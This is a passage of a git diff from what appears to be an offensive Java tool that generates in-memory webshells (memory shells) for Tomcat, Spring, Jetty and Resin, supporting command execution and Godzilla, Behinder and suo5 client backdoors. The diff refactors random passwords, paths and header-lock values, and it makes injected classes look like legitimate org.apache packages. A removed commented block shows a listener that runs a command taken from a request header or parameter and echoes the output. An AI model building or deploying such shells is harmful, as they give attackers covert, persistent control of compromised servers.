// private String PARAM = "cmd";
- private String PATH = "/whoopsunix";
+ private String PATH;
// Godzilla
- private String key = "key";
- public String pass = "pass";
+ private String key;
+ public String pass;
// 内存马约束请求头
- private String lockHeaderKey = "User-Agent";
- private String lockHeaderValue = "Whoopsunix";
+ private String lockHeaderKey;
+ private String lockHeaderValue;
/**
* JavaClass 信息
@@ -66,7 +73,8 @@ public class JavaClassHelper {
// javaClassName 是最外层的类名
private String javaClassName;
private boolean randomJavaClassName;
- private String javaClassPackageHost;
+ // 包名
+ private String javaClassPackageName;
public JavaClassHelper() {
@@ -74,16 +82,9 @@ public JavaClassHelper() {
this.extendsAbstractTranslet = false;
this.isLoader = false;
this.javaClassType = JavaClassType.Default;
- this.javaClassEnhance = JavaClassEnhance.Default;
-
- this.NAME = RanDomUtils.generateRandomOnlyString(3, 7);
- this.HEADER = RanDomUtils.generateRandomOnlyString(3, 7);
- this.RHEADER = RanDomUtils.generateRandomOnlyString(3, 7);
- this.PATH = "/" + RanDomUtils.generateRandomOnlyString(3, 7);
- this.lockHeaderKey = "User-Agent";
- this.lockHeaderValue = RanDomUtils.generateRandomOnlyString(3, 7);
- this.key = RanDomUtils.generateRandomString(3, 7);
- this.pass = RanDomUtils.generateRandomString(3, 7);
+ this.javaClassEnhances = new JavaClassEnhance[]{JavaClassEnhance.Default};
+ this.javaClassMakerEnhances = new JavaClassMakerEnhance[]{JavaClassMakerEnhance.Default};
+ this.memShellType = MemShellType.Default;
}
/**
@@ -121,12 +122,20 @@ public void setJavaClassType(String javaClassType) {
this.javaClassType = javaClassType;
}
- public JavaClassEnhance getJavaClassEnhance() {
- return javaClassEnhance;
+ public JavaClassEnhance[] getJavaClassEnhances() {
+ return javaClassEnhances;
+ }
+
+ public void setJavaClassEnhances(JavaClassEnhance[] javaClassEnhances) {
+ this.javaClassEnhances = javaClassEnhances;
}
- public void setJavaClassEnhance(JavaClassEnhance javaClassEnhance) {
- this.javaClassEnhance = javaClassEnhance;
+ public JavaClassMakerEnhance[] getJavaClassMakerEnhances() {
+ return javaClassMakerEnhances;
+ }
+
+ public void setJavaClassMakerEnhances(JavaClassMakerEnhance[] javaClassMakerEnhances) {
+ this.javaClassMakerEnhances = javaClassMakerEnhances;
}
public String getMiddleware() {
@@ -153,6 +162,14 @@ public void setMemShellFunction(String memShellFunction) {
this.memShellFunction = memShellFunction;
}
+ public String getMemShellType() {
+ return memShellType;
+ }
+
+ public void setMemShellType(String memShellType) {
+ this.memShellType = memShellType;
+ }
+
public String getNAME() {
return NAME;
}
@@ -257,11 +274,11 @@ public void setRandomJavaClassName(boolean randomJavaClassName) {
this.randomJavaClassName = randomJavaClassName;
}
- public String getJavaClassPackageHost() {
- return javaClassPackageHost;
+ public String getJavaClassPackageName() {
+ return javaClassPackageName;
}
- public void setJavaClassPackageHost(String javaClassPackageHost) {
- this.javaClassPackageHost = javaClassPackageHost;
+ public void setJavaClassPackageName(String javaClassPackageName) {
+ this.javaClassPackageName = javaClassPackageName;
}
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/annotation/JavaClassEnhance.java b/javaClassBuilder/src/main/java/com/ppp/annotation/JavaClassEnhance.java
index 95d9afe..2459b7b 100644
--- a/javaClassBuilder/src/main/java/com/ppp/annotation/JavaClassEnhance.java
+++ b/javaClassBuilder/src/main/java/com/ppp/annotation/JavaClassEnhance.java
@@ -4,12 +4,36 @@
/**
* @author Whoopsunix
- * JavaClass 增强
+ * JavaClass 输出增强
*/
public enum JavaClassEnhance {
- Default,
- FreeMarker,
+ /**
+ * 输出
+ */
+ Default("default"),
+ Script("Script"),
+ SPEL("SPEL"),
+ SPELLoadClass("SPEL LoadClass"),
+ FreeMarker("FreeMarker"),
;
+ private final String info;
+
+ JavaClassEnhance(String info) {
+ this.info = info;
+ }
+
+ public String getInfo() {
+ return info;
+ }
+
+ public static JavaClassEnhance[] splitJavaClassEnhance(String enchant) {
+ String[] split = enchant.split(",");
+ JavaClassEnhance[] javaClassEnhances = new JavaClassEnhance[split.length];
+ for (int i = 0; i < split.length; i++) {
+ javaClassEnhances[i] = getJavaClassEnhanceEnums(split[i]);
+ }
+ return javaClassEnhances;
+ }
public static JavaClassEnhance getJavaClassEnhanceEnums(String enchantEnums) {
for (JavaClassEnhance value : values()) {
diff --git a/javaClassBuilder/src/main/java/com/ppp/annotation/JavaClassMakerEnhance.java b/javaClassBuilder/src/main/java/com/ppp/annotation/JavaClassMakerEnhance.java
new file mode 100644
index 0000000..bed63ca
--- /dev/null
+++ b/javaClassBuilder/src/main/java/com/ppp/annotation/JavaClassMakerEnhance.java
@@ -0,0 +1,45 @@
+package com.ppp.annotation;
+
+import com.ppp.Printer;
+
+/**
+ * @author Whoopsunix
+ * JavaClass 创建增强
+ */
+public enum JavaClassMakerEnhance {
+ /**
+ * 输出
+ */
+ Default("default"),
+ JDK17("JDK17")
+ ;
+ private final String info;
+
+ JavaClassMakerEnhance(String info) {
+ this.info = info;
+ }
+
+ public String getInfo() {
+ return info;
+ }
+
+ public static JavaClassMakerEnhance[] splitJavaClassMakerEnhance(String enchant) {
+ String[] split = enchant.split(",");
+ JavaClassMakerEnhance[] javaClassEnhances = new JavaClassMakerEnhance[split.length];
+ for (int i = 0; i < split.length; i++) {
+ javaClassEnhances[i] = getJavaClassMakerEnhanceEnums(split[i]);
+ }
+ return javaClassEnhances;
+ }
+
+ public static JavaClassMakerEnhance getJavaClassMakerEnhanceEnums(String enchantEnums) {
+ for (JavaClassMakerEnhance value : values()) {
+ if (value.name().equalsIgnoreCase(enchantEnums)) {
+ return value;
+ }
+ }
+ if (enchantEnums != null)
+ Printer.warn(String.format("No such JavaClassMakerEnhance: %s , use Default", enchantEnums));
+ return Default;
+ }
+}
diff --git a/javaClassBuilder/src/main/java/com/ppp/annotation/JavaClassType.java b/javaClassBuilder/src/main/java/com/ppp/annotation/JavaClassType.java
index 75dc96a..a0d1db5 100644
--- a/javaClassBuilder/src/main/java/com/ppp/annotation/JavaClassType.java
+++ b/javaClassBuilder/src/main/java/com/ppp/annotation/JavaClassType.java
@@ -14,11 +14,26 @@
@Retention(RetentionPolicy.RUNTIME)
public @interface JavaClassType {
String Default = "Default";
+ /**
+ * Loader
+ */
String AutoFind = "AutoFind";
String value();
public static class Utils {
+// public static String[] splitJavaClassType(String javaClassType) {
+// if (javaClassType == null) {
+// return new String[]{JavaClassType.Default};
+// }
+// String[] split = javaClassType.split(",");
+// String[] javaClassTypes = new String[split.length];
+// for (int i = 0; i < split.length; i++) {
+// javaClassTypes[i] = getJavaClassType(split[i]);
+// }
+// return javaClassTypes;
+// }
+
public static String getJavaClassType(String javaClassType) {
if (javaClassType != null && javaClassType.equalsIgnoreCase(JavaClassType.AutoFind)) {
return JavaClassType.AutoFind;
diff --git a/javaClassBuilder/src/main/java/com/ppp/annotation/MemShellType.java b/javaClassBuilder/src/main/java/com/ppp/annotation/MemShellType.java
new file mode 100644
index 0000000..11af343
--- /dev/null
+++ b/javaClassBuilder/src/main/java/com/ppp/annotation/MemShellType.java
@@ -0,0 +1,46 @@
+package com.ppp.annotation;
+
+import com.ppp.Printer;
+
+import java.lang.annotation.ElementType;
+import java.lang.annotation.Retention;
+import java.lang.annotation.RetentionPolicy;
+import java.lang.annotation.Target;
+
+/**
+ * 生成类型
+ */
+@Target({ElementType.METHOD, ElementType.TYPE})
+@Retention(RetentionPolicy.RUNTIME)
+public @interface MemShellType {
+ String Default = "Default";
+ /**
+ * MS
+ */
+ String Raw = "Raw";
+
+ String value();
+
+ public static class Utils {
+// public static String[] splitJavaClassType(String javaClassType) {
+// if (javaClassType == null) {
+// return new String[]{JavaClassType.Default};
+// }
+// String[] split = javaClassType.split(",");
+// String[] javaClassTypes = new String[split.length];
+// for (int i = 0; i < split.length; i++) {
+// javaClassTypes[i] = getJavaClassType(split[i]);
+// }
+// return javaClassTypes;
+// }
+
+ public static String getJavaClassType(String javaClassType) {
+ if (javaClassType != null && javaClassType.equalsIgnoreCase(MemShellType.Raw)) {
+ return MemShellType.Raw;
+ } else {
+ Printer.blueInfo("MemShellType not found use Default");
+ return MemShellType.Default;
+ }
+ }
+ }
+}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/builder/JavaClassModifier.java b/javaClassBuilder/src/main/java/com/ppp/middleware/builder/JavaClassModifier.java
index dacd002..2fc2b7f 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/builder/JavaClassModifier.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/builder/JavaClassModifier.java
@@ -3,6 +3,7 @@
import com.ppp.JavaClassHelper;
import com.ppp.Printer;
import com.ppp.annotation.JavaClassModifiable;
+import com.ppp.utils.RanDomUtils;
import com.ppp.utils.maker.AnnotationUtils;
import com.ppp.utils.maker.CryptoUtils;
import com.ppp.utils.maker.JavaClassUtils;
@@ -91,6 +92,62 @@ public static void saveCtClass(CtClass ctClass, JavaClassHelper javaClassHelper)
ctClass.writeFile("/tmp");
}
+ public static void javaClassHelperInit(JavaClassHelper javaClassHelper){
+ if (javaClassHelper.getNAME() == null) {
+ javaClassHelper.setNAME(RanDomUtils.generateRandomOnlyString(3, 7));
+ }
+ if (javaClassHelper.getHEADER() == null) {
+ javaClassHelper.setHEADER(RanDomUtils.generateRandomOnlyString(3, 7));
+ }
+ if (javaClassHelper.getRHEADER() == null) {
+ javaClassHelper.setRHEADER(RanDomUtils.generateRandomOnlyString(3, 7));
+ }
+ if (javaClassHelper.getPATH() == null) {
+ javaClassHelper.setPATH("/" + RanDomUtils.generateRandomOnlyString(3, 7));
+ }
+ if (javaClassHelper.getLockHeaderKey() == null) {
+ javaClassHelper.setLockHeaderKey("User-Agent");
+ }
+ if (javaClassHelper.getLockHeaderValue() == null) {
+ javaClassHelper.setLockHeaderValue(RanDomUtils.generateRandomOnlyString(3, 7));
+ }
+ if (javaClassHelper.getKey() == null) {
+ javaClassHelper.setKey(RanDomUtils.generateRandomString(3, 7));
+ }
+ if (javaClassHelper.getPass() == null) {
+ javaClassHelper.setPass(RanDomUtils.generateRandomString(3, 7));
+ }
+
+ /**
+ * debug
+ */
+// if (javaClassHelper.getNAME() == null) {
+// javaClassHelper.setNAME("Whoopsunix");
+// }
+// if (javaClassHelper.getHEADER() == null) {
+// javaClassHelper.setHEADER("X-Token");
+// }
+// if (javaClassHelper.getRHEADER() == null) {
+// javaClassHelper.setRHEADER("XXX");
+// }
+// if (javaClassHelper.getPATH() == null) {
+// javaClassHelper.setPATH("/whoopsunix");
+// }
+// if (javaClassHelper.getLockHeaderKey() == null) {
+// javaClassHelper.setLockHeaderKey("User-Agent");
+// }
+// if (javaClassHelper.getLockHeaderValue() == null) {
+// javaClassHelper.setLockHeaderValue("Whoopsunix");
+// }
+// if (javaClassHelper.getKey() == null) {
+// javaClassHelper.setKey("key");
+// }
+// if (javaClassHelper.getPass() == null) {
+// javaClassHelper.setPass("pass");
+// }
+
+ }
+
/**
* 内存马、RceEcho 回显的字段
*
@@ -144,8 +201,12 @@ public static void fieldChange(Class cls, CtClass ctClass, JavaClassHelper javaC
// }
if (AnnotationUtils.containsValue(cls, JavaClassModifiable.class, JavaClassModifiable.PATH)) {
String path = javaClassHelper.getPATH();
- Printer.yellowInfo(String.format("Path: %s", path));
- JavaClassUtils.fieldChangeIfExist(ctClass, JavaClassModifiable.PATH, String.format("private static String %s = \"%s\";", JavaClassModifiable.PATH, path));
+ if (path != null) {
+ Printer.yellowInfo(String.format("Path: %s", path));
+ JavaClassUtils.fieldChangeIfExist(ctClass, JavaClassModifiable.PATH, String.format("private static String %s = \"%s\";", JavaClassModifiable.PATH, path));
+ } else {
+ Printer.yellowInfo("Path: /*");
+ }
}
if (AnnotationUtils.containsValue(cls, JavaClassModifiable.class, JavaClassModifiable.pass)) {
@@ -169,7 +230,7 @@ public static void fieldChange(Class cls, CtClass ctClass, JavaClassHelper javaC
public static String randomJavaClassName(JavaClassHelper javaClassHelper) {
// 真实包名
String realPackageName = "org.apache";
- String javaClassPackageHost = javaClassHelper.getJavaClassPackageHost();
+ String javaClassPackageName = javaClassHelper.getJavaClassPackageName();
ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
Set classNames = getClassNamesFromPackage(classLoader, realPackageName);
@@ -184,26 +245,30 @@ public static String randomJavaClassName(JavaClassHelper javaClassHelper) {
Collections.shuffle(parts);
StringBuilder javaClassName = new StringBuilder();
- if (javaClassPackageHost != null) {
- Printer.yellowInfo("javaClass Package Host: " + javaClassPackageHost);
- javaClassName.append(javaClassPackageHost);
+ if (javaClassPackageName != null) {
+ Printer.yellowInfo("javaClass Package Host: " + javaClassPackageName);
+ javaClassName.append(javaClassPackageName);
+ String part = (parts.get(0) + RanDomUtils.generateRandomOnlyString(3)).toLowerCase();
+ part = part.substring(0, 1).toUpperCase() + part.substring(1);
+
+ javaClassName.append(".").append(part);
} else {
javaClassName.append(realPackageName);
- }
+ for (int i = 0; i < parts.size(); i++) {
+ String part = parts.get(i).toLowerCase();
- for (int i = 0; i < parts.size(); i++) {
- String part = parts.get(i).toLowerCase();
-
- if (i == parts.size() - 1) {
- part = part.substring(0, 1).toUpperCase() + part.substring(1);
- }
- if (javaClassName.length() > 0) {
- javaClassName.append(".");
+ if (i == parts.size() - 1) {
+ part = part.substring(0, 1).toUpperCase() + part.substring(1);
+ }
+ if (javaClassName.length() > 0) {
+ javaClassName.append(".");
+ }
+ part = part.replaceAll("\\d", "");
+ javaClassName.append(part);
}
- part = part.replaceAll("\\d", "");
- javaClassName.append(part);
}
+
return javaClassName.toString();
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/builder/MSJavaClassBuilder.java b/javaClassBuilder/src/main/java/com/ppp/middleware/builder/MSJavaClassBuilder.java
index 4e48587..71beb8e 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/builder/MSJavaClassBuilder.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/builder/MSJavaClassBuilder.java
@@ -6,6 +6,7 @@
import com.ppp.annotation.MemShell;
import com.ppp.annotation.MemShellFunction;
import com.ppp.annotation.Middleware;
+import com.ppp.utils.RanDomUtils;
import com.ppp.utils.maker.CryptoUtils;
import javassist.ClassClassPath;
import javassist.ClassPool;
@@ -24,34 +25,13 @@ public class MSJavaClassBuilder {
@MemShell(MemShell.Listener)
@MemShellFunction(MemShellFunction.Exec)
public byte[] tomcatListenerExec(Class cls, JavaClassHelper javaClassHelper) throws Exception {
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
CtClass ctClass = initCtClass(cls);
// response
tomcatListenerResponseMaker(ctClass);
- // run
-// CtMethod runCtMethod = ctClass.getDeclaredMethod("run");
-// runCtMethod.setBody("{try {\n" +
-// " Object httpServletRequest = invokeMethod($1, \"getServletRequest\", new Class[]{}, new Object[]{});\n" +
-// " Object header = invokeMethod(httpServletRequest, \"getHeader\", new Class[]{String.class}, new Object[]{HEADER});\n" +
-// " Object param = invokeMethod(httpServletRequest, \"getParameter\", new Class[]{String.class}, new Object[]{PARAM});\n" +
-// " String str = null;\n" +
-// " if (header != null) {\n" +
-// " str = (String) header;\n" +
-// " } else if (param != null) {\n" +
-// " str = (String) param;\n" +
-// " }\n" +
-// " String result = exec(str);\n" +
-// " Object response = getResponse(httpServletRequest);\n" +
-// " invokeMethod(response, \"setStatus\", new Class[]{Integer.TYPE}, new Object[]{new Integer(200)});\n" +
-// " Object writer = invokeMethod(response, \"getWriter\", new Class[]{}, new Object[]{});\n" +
-// " invokeMethod(writer, \"println\", new Class[]{String.class}, new Object[]{result});\n" +
-// "} catch (Exception ignored) {\n" +
-//// " ignored.printStackTrace();\n" +
-// "}}");
-
JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
-
return JavaClassModifier.toBytes(ctClass);
}
@@ -59,14 +39,15 @@ public byte[] tomcatListenerExec(Class cls, JavaClassHelper javaClassHelper) thr
@MemShell(MemShell.Listener)
@MemShellFunction(MemShellFunction.Godzilla)
public byte[] tomcatListenerGodzilla(Class cls, JavaClassHelper javaClassHelper) throws Exception {
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
CtClass ctClass = initCtClass(cls);
// response
tomcatListenerResponseMaker(ctClass);
godzillaMS(javaClassHelper);
- JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
return JavaClassModifier.toBytes(ctClass);
}
@@ -74,14 +55,15 @@ public byte[] tomcatListenerGodzilla(Class cls, JavaClassHelper javaClassHelper)
@MemShell(MemShell.Listener)
@MemShellFunction(MemShellFunction.Behinder)
public byte[] tomcatListenerBehinder(Class cls, JavaClassHelper javaClassHelper) throws Exception {
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
CtClass ctClass = initCtClass(cls);
// response
tomcatListenerResponseMaker(ctClass);
behinderMS(javaClassHelper);
- JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
return JavaClassModifier.toBytes(ctClass);
}
@@ -89,13 +71,13 @@ public byte[] tomcatListenerBehinder(Class cls, JavaClassHelper javaClassHelper)
@MemShell(MemShell.Listener)
@MemShellFunction(MemShellFunction.sou5)
public byte[] tomcatListenerSou5(Class cls, JavaClassHelper javaClassHelper) throws Exception {
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
CtClass ctClass = initCtClass(cls);
// response
tomcatListenerResponseMaker(ctClass);
JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
-
return JavaClassModifier.toBytes(ctClass);
}
@@ -114,97 +96,155 @@ public void tomcatListenerResponseMaker(CtClass ctClass) throws Exception {
@MemShell(MemShell.Servlet)
@MemShellFunction(MemShellFunction.Exec)
public byte[] tomcatServletExec(Class cls, JavaClassHelper javaClassHelper) throws Exception {
- return defaultOriginalMS(cls, javaClassHelper);
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
+ CtClass ctClass = initCtClass(cls);
+
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ return JavaClassModifier.toBytes(ctClass);
}
@Middleware(Middleware.Tomcat)
@MemShell(MemShell.Servlet)
@MemShellFunction(MemShellFunction.Godzilla)
public byte[] tomcatServletGodzilla(Class cls, JavaClassHelper javaClassHelper) throws Exception {
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
+ CtClass ctClass = initCtClass(cls);
+
godzillaMS(javaClassHelper);
- return defaultOriginalMS(cls, javaClassHelper);
+
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ return JavaClassModifier.toBytes(ctClass);
}
@Middleware(Middleware.Tomcat)
@MemShell(MemShell.Servlet)
@MemShellFunction(MemShellFunction.Behinder)
public byte[] tomcatServletBehinder(Class cls, JavaClassHelper javaClassHelper) throws Exception {
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
+ CtClass ctClass = initCtClass(cls);
+
behinderMS(javaClassHelper);
- return defaultOriginalMS(cls, javaClassHelper);
+
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ return JavaClassModifier.toBytes(ctClass);
}
@Middleware(Middleware.Tomcat)
@MemShell(MemShell.Servlet)
@MemShellFunction(MemShellFunction.sou5)
public byte[] tomcatServletSou5(Class cls, JavaClassHelper javaClassHelper) throws Exception {
- return defaultOriginalMS(cls, javaClassHelper);
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
+ CtClass ctClass = initCtClass(cls);
+
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ return JavaClassModifier.toBytes(ctClass);
}
@Middleware(Middleware.Tomcat)
@MemShell(MemShell.Filter)
@MemShellFunction(MemShellFunction.Exec)
public byte[] tomcatFilterExec(Class cls, JavaClassHelper javaClassHelper) throws Exception {
- return defaultOriginalMS(cls, javaClassHelper);
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
+ CtClass ctClass = initCtClass(cls);
+
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ return JavaClassModifier.toBytes(ctClass);
}
@Middleware(Middleware.Tomcat)
@MemShell(MemShell.Filter)
@MemShellFunction(MemShellFunction.Godzilla)
public byte[] tomcatFilterGodzilla(Class cls, JavaClassHelper javaClassHelper) throws Exception {
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
+ CtClass ctClass = initCtClass(cls);
+
godzillaMS(javaClassHelper);
- return defaultOriginalMS(cls, javaClassHelper);
+
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ return JavaClassModifier.toBytes(ctClass);
}
@Middleware(Middleware.Tomcat)
@MemShell(MemShell.Filter)
@MemShellFunction(MemShellFunction.Behinder)
public byte[] tomcatFilterBehinder(Class cls, JavaClassHelper javaClassHelper) throws Exception {
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
+ CtClass ctClass = initCtClass(cls);
+
behinderMS(javaClassHelper);
- return defaultOriginalMS(cls, javaClassHelper);
+
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ return JavaClassModifier.toBytes(ctClass);
}
@Middleware(Middleware.Tomcat)
@MemShell(MemShell.Filter)
@MemShellFunction(MemShellFunction.sou5)
public byte[] tomcatFilterSou5(Class cls, JavaClassHelper javaClassHelper) throws Exception {
- return defaultOriginalMS(cls, javaClassHelper);
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
+ CtClass ctClass = initCtClass(cls);
+
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ return JavaClassModifier.toBytes(ctClass);
}
@Middleware(Middleware.Tomcat)
@MemShell(MemShell.Executor)
@MemShellFunction(MemShellFunction.Exec)
public byte[] tomcatExecutorExec(Class cls, JavaClassHelper javaClassHelper) throws Exception {
- return defaultOriginalMS(cls, javaClassHelper);
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
+ CtClass ctClass = initCtClass(cls);
+
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ return JavaClassModifier.toBytes(ctClass);
}
@Middleware(Middleware.Tomcat)
@MemShell(MemShell.Valve)
@MemShellFunction(MemShellFunction.Exec)
public byte[] tomcatValveExec(Class cls, JavaClassHelper javaClassHelper) throws Exception {
- return defaultOriginalMS(cls, javaClassHelper);
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
+ CtClass ctClass = initCtClass(cls);
+
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ return JavaClassModifier.toBytes(ctClass);
}
@Middleware(Middleware.Tomcat)
@MemShell(MemShell.Valve)
@MemShellFunction(MemShellFunction.Godzilla)
public byte[] tomcatValveGodzilla(Class cls, JavaClassHelper javaClassHelper) throws Exception {
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
+ CtClass ctClass = initCtClass(cls);
+
godzillaMS(javaClassHelper);
- return defaultOriginalMS(cls, javaClassHelper);
+
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ return JavaClassModifier.toBytes(ctClass);
}
@Middleware(Middleware.Tomcat)
@MemShell(MemShell.Valve)
@MemShellFunction(MemShellFunction.Behinder)
public byte[] tomcatValveBehinder(Class cls, JavaClassHelper javaClassHelper) throws Exception {
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
+ CtClass ctClass = initCtClass(cls);
+
behinderMS(javaClassHelper);
- return defaultOriginalMS(cls, javaClassHelper);
+
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ return JavaClassModifier.toBytes(ctClass);
}
@Middleware(Middleware.Tomcat)
@MemShell(MemShell.Valve)
@MemShellFunction(MemShellFunction.sou5)
public byte[] tomcatValveSou5(Class cls, JavaClassHelper javaClassHelper) throws Exception {
- return defaultOriginalMS(cls, javaClassHelper);
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
+ CtClass ctClass = initCtClass(cls);
+
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ return JavaClassModifier.toBytes(ctClass);
}
/**
@@ -214,22 +254,39 @@ public byte[] tomcatValveSou5(Class cls, JavaClassHelper javaClassHelper) throws
@MemShell(MemShell.Controller)
@MemShellFunction(MemShellFunction.Exec)
public byte[] springControllerExec(Class cls, JavaClassHelper javaClassHelper) throws Exception {
- return defaultOriginalMS(cls, javaClassHelper);
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
+ CtClass ctClass = initCtClass(cls);
+
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ return JavaClassModifier.toBytes(ctClass);
}
@Middleware(Middleware.Spring)
@MemShell(MemShell.Interceptor)
@MemShellFunction(MemShellFunction.Exec)
public byte[] springInterceptorExec(Class cls, JavaClassHelper javaClassHelper) throws Exception {
- return defaultOriginalMS(cls, javaClassHelper);
+
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
+ CtClass ctClass = initCtClass(cls);
+
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ return JavaClassModifier.toBytes(ctClass);
}
@Middleware(Middleware.Spring)
@MemShell(MemShell.Interceptor)
@MemShellFunction(MemShellFunction.Godzilla)
public byte[] springInterceptorGodzilla(Class cls, JavaClassHelper javaClassHelper) throws Exception {
+ String userInputPath = javaClassHelper.getPATH();
+
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
+ CtClass ctClass = initCtClass(cls);
+ javaClassHelper.setPATH(userInputPath);
+
godzillaMS(javaClassHelper);
- return defaultOriginalMS(cls, javaClassHelper);
+
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ return JavaClassModifier.toBytes(ctClass);
}
/**
@@ -239,13 +296,13 @@ public byte[] springInterceptorGodzilla(Class cls, JavaClassHelper javaClassHelp
@MemShell(MemShell.Listener)
@MemShellFunction(MemShellFunction.Exec)
public byte[] jettyListenerExec(Class cls, JavaClassHelper javaClassHelper) throws Exception {
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
CtClass ctClass = initCtClass(cls);
// response
jettyListenerResponseMaker(ctClass);
JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
-
return JavaClassModifier.toBytes(ctClass);
}
@@ -254,14 +311,15 @@ public byte[] jettyListenerExec(Class cls, JavaClassHelper javaClassHelper) thro
@MemShell(MemShell.Listener)
@MemShellFunction(MemShellFunction.Godzilla)
public byte[] jettyListenerGodzilla(Class cls, JavaClassHelper javaClassHelper) throws Exception {
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
CtClass ctClass = initCtClass(cls);
// response
jettyListenerResponseMaker(ctClass);
godzillaMS(javaClassHelper);
- JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
return JavaClassModifier.toBytes(ctClass);
}
@@ -269,14 +327,15 @@ public byte[] jettyListenerGodzilla(Class cls, JavaClassHelper javaClassHelper)
@MemShell(MemShell.Listener)
@MemShellFunction(MemShellFunction.Behinder)
public byte[] jettyListenerBehinder(Class cls, JavaClassHelper javaClassHelper) throws Exception {
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
CtClass ctClass = initCtClass(cls);
// response
jettyListenerResponseMaker(ctClass);
behinderMS(javaClassHelper);
- JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
return JavaClassModifier.toBytes(ctClass);
}
@@ -284,13 +343,13 @@ public byte[] jettyListenerBehinder(Class cls, JavaClassHelper javaClassHelper)
@MemShell(MemShell.Listener)
@MemShellFunction(MemShellFunction.sou5)
public byte[] jettyListenerSuo5(Class cls, JavaClassHelper javaClassHelper) throws Exception {
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
CtClass ctClass = initCtClass(cls);
// response
jettyListenerResponseMaker(ctClass);
JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
-
return JavaClassModifier.toBytes(ctClass);
}
@@ -309,13 +368,13 @@ public void jettyListenerResponseMaker(CtClass ctClass) throws Exception {
@MemShell(MemShell.Listener)
@MemShellFunction(MemShellFunction.Exec)
public byte[] resinListenerExec(Class cls, JavaClassHelper javaClassHelper) throws Exception {
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
CtClass ctClass = initCtClass(cls);
// response
resinListenerResponseMaker(ctClass);
JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
-
return JavaClassModifier.toBytes(ctClass);
}
@@ -323,14 +382,15 @@ public byte[] resinListenerExec(Class cls, JavaClassHelper javaClassHelper) thro
@MemShell(MemShell.Listener)
@MemShellFunction(MemShellFunction.Godzilla)
public byte[] resinListenerGodzilla(Class cls, JavaClassHelper javaClassHelper) throws Exception {
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
CtClass ctClass = initCtClass(cls);
// response
resinListenerResponseMaker(ctClass);
godzillaMS(javaClassHelper);
- JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
+ JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper);
return JavaClassModifier.toBytes(ctClass);
}
@@ -338,14 +398,15 @@ public byte[] resinListenerGodzilla(Class cls, JavaClassHelper javaClassHelper)
@MemShell(MemShell.Listener)
@MemShellFunction(MemShellFunction.Behinder)
public byte[] resinListenerBehinder(Class cls, JavaClassHelper javaClassHelper) throws Exception {
+ JavaClassModifier.javaClassHelperInit(javaClassHelper);
CtClass ctClass = initCtClass(cls);
// response
resinListenerResponseMaker(ctClass);
behinderMS(javaClassHelper);
